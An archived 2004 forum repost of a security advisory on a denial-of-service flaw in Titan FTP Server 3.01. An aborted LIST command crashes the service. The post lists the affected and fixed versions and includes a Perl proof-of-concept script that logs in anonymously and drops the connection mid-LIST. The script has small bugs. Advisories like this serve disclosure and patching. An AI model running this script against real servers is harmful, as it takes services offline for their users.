Titan Ftp Server Aborted List Dos

Full Version: Titan Ftp Server Aborted List Dos

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

May 4 2004, 02:49 PM

QUOTE

Titan FTP Server Aborted LIST DoS
------------------------------------------------------------------------

SUMMARY

A security vulnerability exists in South River Technologies' Titan FTP
Server, a user issuing a LIST command and disconnecting before the LIST
command had the time to connect, will cause the program to try and access
an invalid socket. This will result in the FTP service's crash (and in
turn, no longer being able to service any additional users).

DETAILS

Vulnerable Systems:
* Titan FTP Server version 3.01 build 163

Immune Systems:
* Titan FTP Server version 3.10 build 169

Solution:
To solve this issue upgrade to the latest version (3.10 build 169 or
newer).

Exploit:
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability

use IO::Socket;

$host = "192.168.1.243";

my @combination;
$combination[0] = "LIST \r\n";

for (my $i = 0; $combination[$i] ; $i++)
{
print "Combination: $1\n";

$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "2112",
);
unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
last;
}
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;

while (<$remote>)
{
print $_;
if (/331 /)
{
last;
}
}

$ftp = "PASS a\@b.com\r\n";
print $remote $ftp;
print $ftp;

while (<$remote>)
{
print $_;
if (/230 /)
{
last;
}
}

$ftp = $combination[$i];

print $remote $ftp;
print $ftp;

while (<$remote>)
{
print $_;
if (/150 /)
{
last;
}

close $remote;
}

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.